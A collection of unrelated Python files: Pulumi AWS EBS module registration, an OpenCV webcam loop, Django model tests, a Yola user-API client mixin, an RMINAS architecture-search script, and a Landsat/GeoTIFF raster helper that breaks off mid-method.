def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "aws:ebs/defaultKmsKey:DefaultKmsKey":
return DefaultKmsKey(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/encryptionByDefault:EncryptionByDefault":
return EncryptionByDefault(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/snapshot:Snapshot":
return Snapshot(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/snapshotCopy:SnapshotCopy":
return SnapshotCopy(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/volume:Volume":
return Volume(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("aws", "ebs/defaultKmsKey", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/encryptionByDefault", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/snapshot", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/snapshotCopy", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/volume", _module_instance)
_register_module()
|
import cv2
def main():
#cv2.namedWindow('show',0)
#cv2.resizeWindow('show',640,360)
vc = cv2.VideoCapture(0) #웹캠 읽기
#vc = cv2.VideoCapture('./images/video2.mp4') #원하는 동영상을 읽기
vlen = int(vc.get(cv2.CAP_PROP_FRAME_COUNT)) #동영상이 갖고 있는 정보를 vc의 get() 함수로 읽기
print (vlen) # 웹캠은 video length 가 0 입니다.
while True:
ret, img = vc.read() #vc 객체에서 read() 함수로 img 읽기
#ret 은 read() 함수에서 이미지가 반환되면 True, 반대의 경우 False를 받기
if ret == False:
break
start = cv2.getTickCount()
img = cv2.flip(img, 1) # 보통 웹캠은 좌우 반전
# preprocess
#img_rgb = cv2.cvtColor(img_orig, cv2.COLOR_BGR2RGB)
# detector
#img_rgb_vga = cv2.resize(img_rgb, (640, 360))
time = (cv2.getTickCount() - start) / cv2.getTickFrequency() * 1000
print ('[INFO] time: %.2fms'%time)
cv2.imshow('show', img)
key = cv2.waitKey(1)
if key == 27:
break
if __name__ == '__main__':
main()
|
from .awd_lstm import *
from .transformer import *
__all__ = [*awd_lstm.__all__, *transformer.__all__]
|
from django.test import TestCase
from django.db import models
from django.core import mail
from django.contrib.auth import get_user_model
from ..models import Blog, Post, Subscription, Feed
class BlogModelTest(TestCase):
fixtures = ['initial_data.json']
def test_author_label(self):
blog = Blog.objects.get(id=1)
field_label = blog._meta.get_field('author').verbose_name
self.assertEqual(field_label, 'author')
def test_author_field_related_model(self):
blog = Blog.objects.get(id=1)
related_model = blog._meta.get_field('author').related_model
self.assertEqual(related_model, get_user_model())
def test_author_field_on_detele(self):
blog = Blog.objects.get(id=1)
on_detele = blog._meta.get_field(
'author').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_object_name_is_author_username(self):
blog = Blog.objects.get(id=1)
expected_object_name = blog.author.get_username()
self.assertEqual(str(blog), expected_object_name)
class PostModelTest(TestCase):
fixtures = ['initial_data.json']
def test_title_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('title').verbose_name
self.assertEqual(field_label, 'title')
def test_name_max_length(self):
post = Post.objects.get(id=1)
max_length = post._meta.get_field('title').max_length
self.assertEqual(max_length, 255)
def test_blog_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('blog').verbose_name
self.assertEqual(field_label, 'blog')
def test_blog_field_related_model(self):
post = Post.objects.get(id=1)
related_model = post._meta.get_field('blog').related_model
self.assertEqual(related_model, Blog)
def test_blog_field_on_detele(self):
post = Post.objects.get(id=1)
on_detele = post._meta.get_field(
'blog').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_date_posted_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('posted').verbose_name
self.assertEqual(field_label, 'posted')
def test_date_added_auto_now_add(self):
post = Post.objects.get(id=1)
auto_now_add = post._meta.get_field('posted').auto_now_add
self.assertEqual(auto_now_add, True)
def test_content_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('content').verbose_name
self.assertEqual(field_label, 'content')
def test_content_max_length(self):
post = Post.objects.get(id=1)
max_length = post._meta.get_field('content').max_length
self.assertEqual(max_length, 10000)
def test_ordering(self):
post = Post.objects.get(id=1)
ordering = post._meta.ordering
self.assertEqual(ordering, ['-posted'])
def test_save_method(self):
blog = Blog.objects.get(id=2)
subscriber = get_user_model().objects.get(pk=1)
subscription = Subscription.objects.get(pk=1)
post = Post.objects.create(title='Test title', blog=blog)
feed = Feed.objects.get(pk=7)
self.assertEqual(feed.user, subscriber)
self.assertEqual(feed.subscription, subscription)
self.assertEqual(feed.post.id, post.id)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'New post')
def test_object_name_is_title(self):
post = Post.objects.get(id=1)
expected_object_name = post.title
self.assertEqual(str(post), expected_object_name)
class SubscriptionModelTest(TestCase):
fixtures = ['initial_data.json']
def test_user_label(self):
subscription = Subscription.objects.get(id=1)
field_label = subscription._meta.get_field('user').verbose_name
self.assertEqual(field_label, 'user')
def test_user_field_related_model(self):
subscription = Subscription.objects.get(id=1)
related_model = subscription._meta.get_field('user').related_model
self.assertEqual(related_model, get_user_model())
def test_user_field_on_detele(self):
subscription = Subscription.objects.get(id=1)
on_detele = subscription._meta.get_field(
'user').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_blog_label(self):
subscription = Subscription.objects.get(id=1)
field_label = subscription._meta.get_field('blog').verbose_name
self.assertEqual(field_label, 'blog')
def test_blog_field_related_model(self):
subscription = Subscription.objects.get(id=1)
related_model = subscription._meta.get_field('blog').related_model
self.assertEqual(related_model, Blog)
def test_blog_field_on_detele(self):
subscription = Subscription.objects.get(id=1)
on_detele = subscription._meta.get_field(
'blog').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_unique_together(self):
subscription = Subscription.objects.get(id=1)
unique_together = subscription._meta.unique_together
self.assertEqual(unique_together, (('user', 'blog'),))
def test_object_name_is_blog_author_username(self):
subscription = Subscription.objects.get(id=1)
expected_object_name = subscription.blog.author.username
self.assertEqual(str(subscription), expected_object_name)
class FeedModelTest(TestCase):
fixtures = ['initial_data.json']
def test_user_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('user').verbose_name
self.assertEqual(field_label, 'user')
def test_user_field_related_model(self):
feed = Feed.objects.get(id=1)
related_model = feed._meta.get_field('user').related_model
self.assertEqual(related_model, get_user_model())
def test_user_field_on_detele(self):
feed = Feed.objects.get(id=1)
on_detele = feed._meta.get_field(
'user').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_post_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('post').verbose_name
self.assertEqual(field_label, 'post')
def test_post_field_related_model(self):
feed = Feed.objects.get(id=1)
related_model = feed._meta.get_field('post').related_model
self.assertEqual(related_model, Post)
def test_post_field_on_detele(self):
feed = Feed.objects.get(id=1)
on_detele = feed._meta.get_field(
'post').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_subscription_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('subscription').verbose_name
self.assertEqual(field_label, 'subscription')
def test_subscription_field_related_model(self):
feed = Feed.objects.get(id=1)
related_model = feed._meta.get_field('subscription').related_model
self.assertEqual(related_model, Subscription)
def test_subscription_field_on_detele(self):
feed = Feed.objects.get(id=1)
on_detele = feed._meta.get_field(
'subscription').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_is_read_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('is_read').verbose_name
self.assertEqual(field_label, 'is read')
def test_is_read_default(self):
feed = Feed.objects.get(id=1)
default = feed._meta.get_field('is_read').default
self.assertEqual(default, False)
def test_ordering(self):
feed = Feed.objects.get(id=1)
ordering = feed._meta.ordering
self.assertEqual(ordering, ['-post__posted'])
def test_unique_together(self):
feed = Feed.objects.get(id=1)
unique_together = feed._meta.unique_together
self.assertEqual(unique_together, (('user', 'post', 'subscription'),))
def test_object_name_is_post_title(self):
feed = Feed.objects.get(id=1)
expected_object_name = feed.post.title
self.assertEqual(str(feed), expected_object_name)
|
class UserResourceMixin(object):
"""Methods for managing User resources."""
def create_user(self, **attributes):
"""Create a user.
>>> user = yola.create_user(
name='John',
surname='Smith',
email='johnsmith@example.com',
partner_id='WL_PARTNER_ID',
preferences={'preference_name': 'preference_value'})
>>> user['name']
'John'
"""
response = self.post(self._user_path(), json=attributes).json()
response['signup_date'] = response.pop('signupDate')
return response
def update_user(self, user_id, **attributes):
"""Update a user.
>>> yola.update_user('user_id', name='New name')
"""
return self.patch(self._user_path(user_id), json=attributes).json()
def get_user(self, user_id):
"""Get details for a particular user.
>>> user = yola.get_user('user_id')
>>> user['name']
'John'
"""
response = self.get(self._user_path(user_id)).json()
response['signup_date'] = response.pop('signupDate')
return response
def list_users(self, **filters):
"""Return paginated list of users.
>>> yola.list_users()
{
'count': 999,
'previous': None,
'next': 'https://wl.qa.yola.net/pr/users/?page=2',
'results': [
{'name': 'John', 'surname': 'Smith', ...}
]
}
If there are no users, ``results`` will be an empty list. No exception
will be raised.
You may pass pagination options and attribute filters as keyword
arguments. See https://wl.qa.yola.net/users/ for available parameters.
For example:
>>> yola.list_users(page=2, page_size=50, partner_id='WL_YOLA')
"""
return self.get(self._user_path(), params=filters).json()
def delete_user(self, user_id):
"""Delete a user.
>>> yola.delete_user('user_id')
"""
self.delete(self._user_path(user_id))
def get_sso_create_site_url(self, user_id, domain, locale=None):
"""Get SSO create site url for a particular user and domain.
>>> yola.get_sso_create_site_url('user_id', 'example.com')
"""
params = {'domain': domain, 'locale': locale}
return self.get(
self._user_path(
user_id, 'sso_url_create_site'), params=params).json()['url']
def get_sso_open_site_url(self, user_id, site_id=None, locale=None):
"""Get SSO open site url for a particular user.
>>> yola.get_sso_open_site_url('user_id')
"""
return self.get(
self._user_path(user_id, 'sso_url_open_site'), params={
'site_id': site_id,
'locale': locale
}).json()['url']
def get_sso_url(self, user_id, site_id=None,
destination='editor', locale=None):
"""Get SSO url for a particular ws user
>>> yola.get_sso_url('user_id')
"""
return self.get(
self._user_path(user_id, 'sso-url'), params={
'site_id': site_id,
'destination': destination,
'locale': locale,
}).json()['url']
def get_user_wsites(self, user_id):
return self.get(self._user_path(user_id, 'sites')).json()
def set_site_url(self, user_id, site_url):
"""Set new site url for a particular user.
>>> yola.set_site_url('user_id', 'https://new-domain.com')
"""
return self.post(
self._user_path(user_id, 'set-site-url'),
json={'site_url': site_url}
).json()
def _user_path(self, *parts):
path = '/'.join(['users'] + list(parts))
return '/%s/' % path
|
import pickle
import sys
import time
import numpy as np
import torch
from fvcore.nn import FlopCountAnalysis
import xnas.core.config as config
import xnas.logger.logging as logging
from xnas.core.config import cfg
from xnas.core.builder import setup_env, space_builder, optimizer_builder
import xnas.algorithms.RMINAS.sampler.sampling as sampling
from xnas.algorithms.RMINAS.utils.RMI_torch import RMI_loss
from xnas.algorithms.RMINAS.sampler.RF_sampling import RF_suggest
from xnas.algorithms.RMINAS.utils.random_data import get_random_data
from xnas.spaces.DARTS.utils import geno_from_alpha, reformat_DARTS
from xnas.spaces.NASBench201.utils import dict2config, get_cell_based_tiny_net, CellStructure
config.load_configs()
logger = logging.get_logger(__name__)
# RMINAS hyperparameters initialization
RF_space = None
api = None
def rminas_hp_builder():
global RF_space, api
if cfg.SPACE.NAME == 'infer_nb201':
from nas_201_api import NASBench201API
api = NASBench201API(cfg.BENCHMARK.NB201PATH)
RF_space = 'nasbench201'
elif cfg.SPACE.NAME == 'infer_darts':
RF_space = 'darts'
elif cfg.SPACE.NAME == 'nasbenchmacro':
RF_space = 'nasbenchmacro'
from xnas.evaluations.NASBenchMacro.evaluate import evaluate, data
api = data
elif cfg.SPACE.NAME == 'proxyless':
RF_space = 'proxyless'
# for example : arch = '00000000'
# arch = ''
# evaluate(arch)
def main():
device = setup_env()
rminas_hp_builder()
assert cfg.SPACE.NAME in ['infer_nb201', 'infer_darts',"nasbenchmacro", "proxyless"]
assert cfg.LOADER.DATASET in ['cifar10', 'cifar100', 'imagenet', 'imagenet16_120'], 'dataset error'
if cfg.LOADER.DATASET == 'cifar10':
from xnas.algorithms.RMINAS.teacher_model.resnet20_cifar10.resnet import resnet20
checkpoint_res = torch.load('xnas/algorithms/RMINAS/teacher_model/resnet20_cifar10/resnet20.th')
network = torch.nn.DataParallel(resnet20())
network.load_state_dict(checkpoint_res['state_dict'])
network = network.module
elif cfg.LOADER.DATASET == 'cifar100':
from xnas.algorithms.RMINAS.teacher_model.resnet101_cifar100.resnet import resnet101
network = resnet101()
network.load_state_dict(torch.load('xnas/algorithms/RMINAS/teacher_model/resnet101_cifar100/resnet101.pth'))
elif cfg.LOADER.DATASET == 'imagenet':
assert cfg.SPACE.NAME in ('infer_darts', 'proxyless')
logger.warning('Our method does not directly search in ImageNet.')
logger.warning('Only partial tests have been conducted, please use with caution.')
import xnas.algorithms.RMINAS.teacher_model.fbresnet_imagenet.fbresnet as fbresnet
network = fbresnet.fbresnet152()
elif cfg.LOADER.DATASET == 'imagenet16_120':
assert cfg.SPACE.NAME == 'infer_nb201'
from nas_201_api import ResultsCount
"""Teacher Network: using best arch searched from cifar10 and weight from nb201."""
filename = 'xnas/algorithms/RMINAS/teacher_model/nb201model_imagenet16120/009930-FULL.pth'
xdata = torch.load(filename)
odata = xdata['full']['all_results'][('ImageNet16-120', 777)]
result = ResultsCount.create_from_state_dict(odata)
result.get_net_param()
arch_config = result.get_config(CellStructure.str2structure) # create the network with params
net_config = dict2config(arch_config, None)
network = get_cell_based_tiny_net(net_config)
network.load_state_dict(result.get_net_param())
network.cuda()
"""selecting well-performed data."""
more_data_X, more_data_y = get_random_data(cfg.LOADER.BATCH_SIZE, cfg.LOADER.DATASET)
with torch.no_grad():
ce_loss = torch.nn.CrossEntropyLoss(reduction='none').cuda()
more_logits = network(more_data_X)
_, indices = torch.topk(-ce_loss(more_logits, more_data_y).cpu().detach(), cfg.LOADER.BATCH_SIZE)
data_y = more_data_y.detach()
data_X = more_data_X.detach()
with torch.no_grad():
feature_res = network.feature_extractor(data_X)
RFS = RF_suggest(space=RF_space, logger=logger, api=api, thres_rate=cfg.RMINAS.RF_THRESRATE, seed=cfg.RNG_SEED)
# loss function
loss_fun_cka = RMI_loss(data_X.size()[0])
loss_fun_cka = loss_fun_cka.requires_grad_()
loss_fun_cka.cuda()
loss_fun_log = torch.nn.CrossEntropyLoss().cuda()
def train_arch(modelinfo):
flops = None
if cfg.SPACE.NAME == 'infer_nb201':
# get arch
arch_config = {
'name': 'infer.tiny',
'C': 16, 'N': 5,
'arch_str':api.arch(modelinfo),
'num_classes': cfg.LOADER.NUM_CLASSES}
net_config = dict2config(arch_config, None)
model = get_cell_based_tiny_net(net_config).cuda()
elif cfg.SPACE.NAME == 'infer_darts':
cfg.TRAIN.GENOTYPE = str(modelinfo)
model = space_builder().cuda()
elif cfg.SPACE.NAME == 'nasbenchmacro':
model = space_builder().cuda()
optimizer = optimizer_builder("SGD", model.parameters())
elif cfg.SPACE.NAME == 'proxyless':
model = space_builder(stage_width_list=[16, 24, 40, 80, 96, 192, 320],depth_param=modelinfo[:6],ks=modelinfo[6:27][modelinfo[6:27]>0],expand_ratio=modelinfo[27:][modelinfo[27:]>0],dropout_rate=0).cuda()
optimizer = optimizer_builder("SGD", model.parameters())
with torch.no_grad():
tensor = (torch.rand(1, 3, 224, 224).cuda(),)
flops = FlopCountAnalysis(model, tensor).total()
# lr_scheduler = lr_scheduler_builder(optimizer)
# nbm_trainer = OneShotTrainer(
# supernet=model,
# criterion=criterion,
# optimizer=optimizer,
# lr_scheduler=lr_scheduler,
# train_loader=train_loader,
# test_loader=valid_loader,
# sample_type='iter'
# )
model.train()
# weights optimizer
optimizer = optimizer_builder("SGD", model.parameters())
epoch_losses = []
for cur_epoch in range(1, cfg.OPTIM.MAX_EPOCH+1):
optimizer.zero_grad()
features, logits = model.forward_with_features(data_X, modelinfo)
loss_cka = loss_fun_cka(features, feature_res)
loss_logits = loss_fun_log(logits, data_y)
loss = cfg.RMINAS.LOSS_BETA * loss_cka + (1-cfg.RMINAS.LOSS_BETA)*loss_logits
loss.backward()
optimizer.step()
epoch_losses.append(loss.detach().cpu().item())
if cur_epoch == cfg.OPTIM.MAX_EPOCH:
return loss.cpu().detach().numpy(), {'epoch_losses':epoch_losses, 'flops':flops}
trained_arch_darts, trained_loss = [], []
def train_procedure(sample):
if cfg.SPACE.NAME == 'infer_nb201':
mixed_loss, epoch_losses = train_arch(sample)[0]
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
arch_arr = sampling.nb201genostr2array(api.arch(sample))
RFS.trained_arch.append({'arch':arch_arr, 'loss':mixed_loss})
RFS.trained_arch_index.append(sample)
elif cfg.SPACE.NAME == 'infer_darts':
sample_geno = geno_from_alpha(sampling.darts_sug2alpha(sample)) # type=Genotype
trained_arch_darts.append(str(sample_geno))
mixed_loss, epoch_losses = train_arch(sample_geno)[0]
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
RFS.trained_arch.append({'arch':sample, 'loss':mixed_loss})
elif cfg.SPACE.NAME == 'nasbenchmacro':
sample_geno = ''.join(sample.astype('str')) # type=Genotype
trained_arch_darts.append((sample_geno))
mixed_loss, info = train_arch(sample)
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
RFS.trained_arch.append({'arch':sample, 'loss':mixed_loss,'gt':api[sample_geno]['mean_acc'],'losses':info["epoch_losses"]})
elif cfg.SPACE.NAME == 'proxyless':
sample_geno = ''.join(sample.astype('str')) # type=Genotype
trained_arch_darts.append((sample_geno))
mixed_loss, info = train_arch(sample)
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
RFS.trained_arch.append({'arch':sample, 'loss':mixed_loss,'gt':info["flops"],'losses':info["epoch_losses"]})
logger.info("sample: {}, loss:{}".format(sample, mixed_loss))
start_time = time.time()
# ====== Warmup ======
warmup_samples = RFS.warmup_samples(cfg.RMINAS.RF_WARMUP)
logger.info("Warming up with {} archs".format(cfg.RMINAS.RF_WARMUP))
for sample in warmup_samples:
train_procedure(sample)
RFS.Warmup()
# ====== RF Sampling ======
sampling_time = time.time()
sampling_cnt= 0
while sampling_cnt < cfg.RMINAS.RF_SUCC:
print(sampling_cnt)
sample = RFS.fitting_samples()
train_procedure(sample)
sampling_cnt += RFS.Fitting()
if sampling_cnt >= cfg.RMINAS.RF_SUCC:
logger.info('successfully sampling good archs for {} times'.format(sampling_cnt))
else:
logger.info('failed sampling good archs for only {} times'.format(sampling_cnt))
logger.info('RF sampling time cost:{}'.format(str(time.time() - sampling_time)))
# ====== Evaluation ======
logger.info('Total time cost: {}'.format(str(time.time() - start_time)))
logger.info('Actual training times: {}'.format(len(RFS.trained_arch_index)))
if cfg.SPACE.NAME == 'infer_nb201':
logger.info('Searched architecture:\n{}'.format(str(RFS.optimal_arch(method='sum', top=50))))
logger.info('Searched architecture:\n{}'.format(str(RFS.optimal_arch(method='greedy', top=50))))
elif cfg.SPACE.NAME == 'infer_darts':
op_sample = RFS.optimal_arch(method='sum', top=50)
op_alpha = torch.from_numpy(np.r_[op_sample, op_sample])
op_geno = reformat_DARTS(geno_from_alpha(op_alpha))
logger.info('Searched architecture@top50:\n{}'.format(str(op_geno)))
elif cfg.SPACE.NAME == 'nasbenchmacro':
op_sample = RFS.optimal_arch(method='sum', top=50)
# op_alpha = torch.from_numpy(np.r_[op_sample, op_sample])
# op_geno = reformat_DARTS(geno_from_alpha(op_alpha))
logger.info('Searched architecture@top50:\n{}'.format(str(op_sample)))
print(api[op_sample]['mean_acc'])
elif cfg.SPACE.NAME == 'proxyless':
op_sample = RFS.optimal_arch(method='sum', top=100)
# op_alpha = torch.from_numpy(np.r_[op_sample, op_sample])
# op_geno = reformat_DARTS(geno_from_alpha(op_alpha))
logger.info('Searched architecture@top100:\n{}'.format(str(op_sample)))
print(api[op_sample]['mean_acc'])
if __name__ == '__main__':
main()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 5 13:03:17 2017
@author: mschull
"""
from __future__ import division, print_function, absolute_import
__author__ = 'jwely'
__all__ = ["landsat_metadata"]
# standard imports
import os.path
import numpy as np
import logging
from .utils import RasterError,_test_outside
logging.basicConfig(level=logging.DEBUG)
LOGGER = logging.getLogger('pydisalexi.geotiff')
from osgeo import gdal, osr
try:
from pyproj import Proj
except ImportError:
LOGGER.warning(
"PROJ4 is not available. " +
"Any method requiring coordinate transform will fail.")
from datetime import datetime
import inspect
class landsat_metadata:
"""
A landsat metadata object. This class builds is attributes
from the names of each tag in the xml formatted .MTL files that
come with landsat data. So, any tag that appears in the MTL file
will populate as an attribute of landsat_metadata.
You can access explore these attributes by using, for example
.. code-block:: python
from dnppy import landsat
meta = landsat.landsat_metadata(my_filepath) # create object
from pprint import pprint # import pprint
pprint(vars(m)) # pretty print output
scene_id = meta.LANDSAT_SCENE_ID # access specific attribute
:param filename: the filepath to an MTL file.
"""
def __init__(self, filename):
"""
There are several critical attributes that keep a common
naming convention between all landsat versions, so they are
initialized in this class for good record keeping and reference
"""
# custom attribute additions
self.FILEPATH = filename
self.DATETIME_OBJ = None
# product metadata attributes
self.LANDSAT_SCENE_ID = None
self.DATA_TYPE = None
self.ELEVATION_SOURCE = None
self.OUTPUT_FORMAT = None
self.SPACECRAFT_ID = None
self.SENSOR_ID = None
self.WRS_PATH = None
self.WRS_ROW = None
self.NADIR_OFFNADIR = None
self.TARGET_WRS_PATH = None
self.TARGET_WRS_ROW = None
self.DATE_ACQUIRED = None
self.SCENE_CENTER_TIME = None
# image attributes
self.CLOUD_COVER = None
self.IMAGE_QUALITY_OLI = None
self.IMAGE_QUALITY_TIRS = None
self.ROLL_ANGLE = None
self.SUN_AZIMUTH = None
self.SUN_ELEVATION = None
self.EARTH_SUN_DISTANCE = None # calculated for Landsats before 8.
# read the file and populate the MTL attributes
self._read(filename)
def _read(self, filename):
""" reads the contents of an MTL file """
# if the "filename" input is actually already a metadata class object, return it back.
if inspect.isclass(filename):
return filename
fields = []
values = []
metafile = open(filename, 'r')
metadata = metafile.readlines()
for line in metadata:
# skips lines that contain "bad flags" denoting useless data AND lines
# greater than 1000 characters. 1000 character limit works around an odd LC5
# issue where the metadata has 40,000+ characters of whitespace
bad_flags = ["END", "GROUP"]
if not any(x in line for x in bad_flags) and len(line) <= 1000:
try:
line = line.replace(" ", "")
line = line.replace("\n", "")
field_name, field_value = line.split(' = ')
fields.append(field_name)
values.append(field_value)
except:
pass
for i in range(len(fields)):
# format fields without quotes,dates, or times in them as floats
if not any(['"' in values[i], 'DATE' in fields[i], 'TIME' in fields[i]]):
setattr(self, fields[i], float(values[i]))
else:
values[i] = values[i].replace('"', '')
setattr(self, fields[i], values[i])
# create datetime_obj attribute (drop decimal seconds)
dto_string = self.DATE_ACQUIRED + self.SCENE_CENTER_TIME
self.DATETIME_OBJ = datetime.strptime(dto_string.split(".")[0], "%Y-%m-%d%H:%M:%S")
# only landsat 8 includes sun-earth-distance in MTL file, so calculate it
# for the Landsats 4,5,7 using solar module.
# if not self.SPACECRAFT_ID == "LANDSAT_8":
#
# # use 0s for lat and lon, sun_earth_distance is not a function of any one location on earth.
# s = solar(0, 0, self.DATETIME_OBJ, 0)
# self.EARTH_SUN_DISTANCE = s.get_rad_vector()
print("Scene {0} center time is {1}".format(self.LANDSAT_SCENE_ID, self.DATETIME_OBJ))
class GeoTIFF(object):
"""
Represents a GeoTIFF file for data access and processing and provides
a number of useful methods and attributes.
Arguments:
filepath (str): the full or relative file path
"""
def __init__(self, filepath):
try:
self.dataobj = gdal.Open(filepath)
except RuntimeError as err:
LOGGER.error("Could not open %s: %s" % (filepath, err.message))
raise
self.filepath = filepath
self.ncol = self.dataobj.RasterXSize
self.nrow = self.dataobj.RasterYSize
self.nbands = self.dataobj.RasterCount
self._gtr = self.dataobj.GetGeoTransform()
# see http://www.gdal.org/gdal_datamodel.html
self.ulx = self._gtr[0]
self.uly = self._gtr[3]
self.lrx = (self.ulx + self.ncol * self._gtr[1]
+ self.nrow * self._gtr[2])
self.lry = (self.uly + self.ncol * self._gtr[4]
+ self.nrow * self._gtr[5])
if self._gtr[2] != 0 or self._gtr[4] != 0:
LOGGER.warning(
"The dataset is not north-up. The geotransform is given "
+ "by: (%s). " % ', '.join([str(item) for item in self._gtr])
+ "Northing and easting values will not have expected meaning."
)
self.dataobj = None
@property
def data(self):
"""2D numpy array for single-band GeoTIFF file data. Otherwise, 3D. """
if not self.dataobj:
self.dataobj = gdal.Open(self.filepath)
dat = self.dataobj.ReadAsArray()
self.dataobj = None
return dat
@property
def projection(self):
"""The dataset's coordinate reference system as a Well-Known String"""
if not self.dataobj:
self.dataobj = gdal.Open(self.filepath)
dat = self.dataobj.GetProjection()
self.dataobj = None
return dat
@property
def proj4(self):
"""The dataset's coordinate reference system as a PROJ4 string"""
osrref = osr.SpatialReference()
osrref.ImportFromWkt(self.projection)
return osrref.ExportToProj4()
@property
def coordtrans(self):
"""A PROJ4 Proj object, which is able to perform coordinate
transformations"""
return Proj(self.proj4)
@property
def delx(self):
"""The sampling distance in x-direction, in physical units
(eg metres)"""
return self._gtr[1]
@property
def dely(self):
"""The sampling distance in y-direction, in physical units
(eg metres). Negative in northern hemisphere."""
return self._gtr[5]
@property
def easting(self):
"""The x-coordinates of first row pixel corners,
as a numpy array: upper-left corner of upper-left pixel
to upper-right corner of upper-right pixel (ncol+1)."""
delta = np.abs(
(self.lrx-self.ulx)/self.ncol
- self.delx
)
if delta > 10e-2:
LOGGER.warn(
"GeoTIFF issue: E-W grid step differs from "
+ "deltaX by more than 1% ")
return np.linspace(self.ulx, self.lrx, self.ncol+1)
@property
def northing(self):
"""The y-coordinates of first column pixel corners,
as a numpy array: lower-left corner of lower-left pixel to
upper-left corner of upper-left pixel (nrow+1)."""
# check if data grid step is consistent
delta = np.abs(
(self.lry-self.uly)/self.nrow
- self.dely
)
if delta > 10e-2:
LOGGER.warn(
"GeoTIFF issue: N-S grid step differs from "
+ "deltaY by more than 1% ")
return np.linspace(self.lry, self.uly, self.nrow+1)
@property
def x_pxcenter(self):
"""The x-coordinates of pixel centers, as a numpy array ncol."""
return np.linspace(
self.ulx + self.delx/2,
self.lrx - self.delx/2,
self.ncol)
@property
def y_pxcenter(self):
"""y-coordinates of pixel centers, nrow."""
return np.linspace(
self.lry - self.dely/2,
self.uly + self.dely/2,
self.nrow)
@property
def _XY(self):
"""Meshgrid of nrow+1, ncol+1 corner xy coordinates"""
return np.meshgrid(self.easting, self.northing)
@property
def _XY_pxcenter(self):
"""Meshgrid of nrow, ncol center xy coordinates"""
return np.meshgrid(self.x_pxcenter, self.y_pxcenter)
@property
def _LonLat_pxcorner(self):
"""Meshgrid of nrow+1, ncol+1 corner Lon/Lat coordinates"""
return self.coordtrans(*self._XY, inverse=True)
@property
def _LonLat_pxcenter(self):
"""Meshgrid of nrow, ncol center Lon/Lat coordinates"""
return self.coordtrans(*self._XY_pxcenter, inverse=True)
@property
def Lon(self):
"""Longitude coordinate of each pixel corner, as an array"""
return self._LonLat_pxcorner[0]
@property
def Lat(self):
"""Latitude coordinate of each pixel corner, as an array"""
return self._LonLat_pxcorner[1]
@property
def Lon_pxcenter(self):
"""Longitude coordinate of each pixel center, as an array"""
return self._LonLat_pxcenter[0]
@property
def Lat_pxcenter(self):
"""Latitude coordinate of each pixel center, as an array"""
return self._LonLat_pxcenter[1]
def ij2xy(self, i, j):
"""
Converts array index pair(s) to easting/northing coordinate pairs(s).
NOTE: array coordinate origin is in the top left corner whereas
easting/northing origin is in the bottom left corner. Easting and
northing are floating point numbers, and refer to the top-left corner
coordinate of the pixel. i runs from 0 to nrow-1, j from 0 to ncol-1.
For i=nrow and j=ncol, the bottom-right corner coordinate of the
bottom-right pixel will be returned. This is identical to the bottom-
right corner.
Arguments:
i (int): scalar or array of row coordinate index
j (int): scalar or array of column coordinate index
Returns:
x (float): scalar or array of easting coordinates
y (float): scalar or array of northing coordinates
"""
if (_test_outside(i, 0, self.nrow)
or _test_outside(j, 0, self.ncol)):
raise RasterError(
"Coordinates %d, %d out of bounds" % (i, j))
x = self.easting[0] + j * self.delx
y = self.northing[-1] + i * self.dely
return x, y
def xy2ij(self, x, y, precise=False):
"""
Convert easting/northing coordinate pair(s) to array coordinate
pairs(s).
NOTE: see note at ij2xy()
Arguments:
x (float): scalar or array of easting coordinates
y (float): scalar or array of northing coordinates
precise (bool): if true, return fractional array coordinates
Returns:
i (int, or float): scalar or array of row coordinate index
j (int, or float): scalar or array of column coordinate index
"""
if (_test_outside(x, self.easting[0], self.easting[-1]) or
_test_outside(y, self.northing[0], self.northing[-1])):
raise RasterError("Coordinates out of bounds")
i = (1 - (y - self.northing[0]) /
(self.northing[-1] - self.northing[0])) * self.nrow
j = ((x - self.easting[0]) /
(self.easting[-1] - self.easting[0])) * self.ncol
if precise:
return i, j
else:
return int(np.floor(i)), int(np.floor(j))
def simpleplot(self):
"""Quick and dirty plot of each band (channel, dataset) in the image.
Requires Matplotlib."""
import matplotlib.pyplot as plt
numbands = self.nbands
if numbands == 1:
plt.figure(figsize=(15, 10))
plt.imshow(self.data[:, :], cmap='bone')
elif numbands > 1:
for idx in range(numbands):
plt.figure(figsize=(15, 10))
plt.imshow(self.data[idx, :, :], cmap='bone')
return True
def clone(self, newpath, newdata):
"""
